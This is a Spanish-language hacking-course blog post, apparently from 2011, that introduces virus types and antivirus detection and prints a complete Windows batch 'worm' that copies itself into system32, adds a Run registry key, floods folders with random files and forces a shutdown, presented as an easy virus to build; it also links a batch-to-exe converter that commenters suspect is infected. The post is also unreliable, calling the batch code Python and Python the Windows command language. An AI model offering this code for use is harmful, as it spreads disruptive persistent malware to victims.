Inicio al Hacking: Introducción a Python y distintos tipos de virus

Planificación:

- Introducción

- Live Cd/Usb

- Intrusion Windows de forma fisica
- Introducción a Python y distintos tipos de virus

- Bindear archivos

- Rastreo de sistemas

- Escanear vulnerabilidades
- Ocultación de ip

- Reventar contraseñas por fuerza bruta
- Explotar e intrusión a un PC remoto

- Hackear Redes WIFI

Capitulo 4:

Lo primero que quiero que sepan es que este articulo seria realmente muy extenso ya que se trata tanto las principales caracteristicas del lenguaje de programacion Python, de como comenzar a programar en dicho lenguaje. Ademas hablaremos de los distintos tipos de virus, de como los antivirus son capaces de detectarlos y como podemos hacer nosotros nuestro propio virus gusano.

Lo primero, Python es un lenguaje de programación de alto nivel que es exactamente el mismo que utilizamos para navegar por la consola de comandos de windows, asique para algunos les sera familiar. Este lenguaje concretamente es muy eficaz a la hora de programar algunos tipos de virus como son los gusano.

Encontré un texto de una revista llamada hackxcrack sobre como comenzar la programación en Python por lo tanto les propongo que se lo descargen de los siguientes enlaces (http://www.mediafire.com/?ajirm8j6giaus67 y http://www.mediafire.com/?85uhi1bgh1s9x9i) y que en caso de tener cualquier duda lo pongan ya sea en el blog o en el tablon del tuenti, ya que sino este articulo seria realmente largo.

Una vez hemos entendido como trabajar con el lenguaje Python voy a explicar un poco los diferentes tipos de virus que hay. Pues bien, normalmente se suelen dividir en dos grandes grupos que son: gusanos (worms), troyanos (trojan) y backdoor.

* Los gusanos son un tipo de virus que su principal misión es la de infectar al objetivo, e ir reproduciéndose, ya sea dentro de ese mismo ordenador, en la red WLAN o mediante correos y cosas así lo que afecta a muchísima mas gente.
Crear un virus gusano (muy sencillito) es realmente fácil si sabemos algo de python, un ejemplo podría ser este:

@echo off

copy %0 %windir%\system32\explorer.bat

REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v IE /t REG_SZ /d %Windir%\system32\explorer.bat

msg* El explorador explotara...

start explorer.exe

start %random%

cd\

cd %homepath%

cd escritorio

echo explorer>>%random%.exe

cd\

cd windows

mrdir %random%

mkdir %random%

echo explorer>>%random%.exe

cd system32

mkdir %random%

echo explorer>>%random%.exe

shutdown -s -f -t 120 -c "Reiniciando para corregir el explorer"

del % 0

exit

Este gusano concretamente sera realmente rápido y aunque no muy silencioso, ya que ira creando gran cantidad de directorios y archivos y los ira abriendo. Como veis es un virus muy sencillo pero letal por decirlo de algún modo, ya que este virus se introduce en la carpeta del sistema operativo de windows, lo que hace que se ejecute al encender el ordenador. Por ello cada vez que encendamos el ordenador no tardaremos mucho en que se nos quede bloqueado así que cuidado al ejecutarlo.

* Los troyanos, son unos virus bastante mas sofisticados y difíciles de programar ya que son mucho mas completos. Un troyano no es mas que un servidor, cuando nosotros queremos infectar a un PC con un troyano lo que hacemos es mandarle un servidor pero configurado, ya que ademas de ser un servidor nos permite acceder a el de forma remota debido a que dejamos un puerto que nosotros queramos abierto (backdoor), ademas tienen keylogger, lo que no permite saber que es lo que esta escribiendo la victima en cada instante (también se nos guarda en un archivo). Esto concretamente es muy útil si el atacante quiere robar datos o contraseñas. Aparte de todo esto... El hacker puede hacer sencillamente lo que quiera con el PC infectado, ya que pasa a tener el control total de el.

¿Como es esto posible sin que el usuario del PC infectado se de cuenta? Pues esto es posible debido a que los atacantes borran todas sus huellas, tanto el los registros como el archivo en si entre otros.. De esto hablaremos en el capitulo de Ocultación de IP.

* Por ultimo vamos a hablar de las backdoors, que son las herramientas que utilizan los hacker para poder volver a introducirse en un PC infectado con algún tipo de virus. Este tipo de programa se vasa en poder abrir de forma permante un puerto en el PC de la victima, de forma que cada vez que encienda el ordenador el hacker pueda entrar en el.

La programación de este tipo de malware es compleja, no tanto como lo seria un troyano pero es costoso.

--------------------------------------------------------------------

Una vez hemos echo una breve pasada sobre como son los diferentes tipos de virus os voy a contar como hacen los antivirus para detectar estos tipos de malware.

Para empezar os voy a definir los dos tipos de acciones que pueden llevar acabo los antivirus para detectar dichos virus:

1- Mediante firmas (Lo utilizan todos los antivirus): Cuando un virus es descubierto por primera vez, se cogen una serie de fragmentos de código que únicamente tiene ese virus, es decir como su huella de identidad con respecto al resto. Pues bien, esos fragmentos constituyen la firma de ese virus. Dicha firma se almacena en las bases de datos de los antivirus que se actualizan diariamente para que cuando nosotros llevemos acabo un informe del antivirus pueda ir comprobando cada archivo con cada firma para saber si es algún tipo de malware o no.

Como podéis ver este método es eficaz en parte, ya que los nuevos virus o los virus que se programe uno mismo (siempre que tengan algún tipo de complejidad) no serán descubiertos por el antivirus.

2- El otro método se vasa en la heuristica, este método es mucho mas complicado, ya que lo que analiza es el comportamiento de cada programa, y en caso de ver que algo no es lo correcto o lo que hace habitualmente avisa diciendo que hay un posible virus. Este método tambien lo implementan algunas marcas antivirus aunque ni mucho menos todas.

Este método es realmente practico pero mucho mas complejo de lo que puedo explicar aquí asique les aconsejo que quien este interesado busque mas sobre el tema de la heuristica.

Antes de terminar quiero que sepan que estos métodos son efectivos siempre que el archivo vaya por si solo ya que si va acompañado de una imagen y oculto dentro de ella ninguno de los dos métodos será capaz de encontrarlo. Esto es lo que os expondré en el siguiente articulo del blog.

Por ultimo quería decir que os he subido un archivo que contiene mucha mas información sobre virus para todo aquel que este interesado, junto con un programa portable que permite transformar nuestros archivos .bat a archivos .exe.
- Texto sobre virus: http://www.mediafire.com/?3pe77g1qs8d62ku
- Programa para pasar de .bat a .exe: http://www.mediafire.com/?lcux5smx1fcvj8b

Pues con esto terminamos el capitulo 4, espero que les sirva de ayuda y ante cualquier duda no dudeis en comentar el blog.

Un saludo!

5 comentarios:

Yonhatan24 de julio de 2012, 9:45
D: esto es de programación batch, no en Python pero esta buena! Saludos
ResponderEliminar
Respuestas
Unknown13 de abril de 2016, 19:43
very good man
ResponderEliminar
Respuestas
obscura caelo14 de julio de 2018, 6:58
- Programa para pasar de .bat a .exe: http://www.mediafire.com/?lcux5smx1fcvj8b no hay nada podrias resubirlo por favor?!!
ResponderEliminar
Respuestas
Unknown24 de marzo de 2019, 4:34
No dice nada de pithon ademas el programa para pasar de .bat a .exe parese que esta infectado y no se puede descargar
ResponderEliminar
Respuestas
unico1 de septiembre de 2019, 18:18
Exelente u esta web parece peligrosa cuidado
ResponderEliminar
Respuestas

Añadir comentario

martes, 7 de junio de 2011

Introducción a Python y distintos tipos de virus

5 comentarios: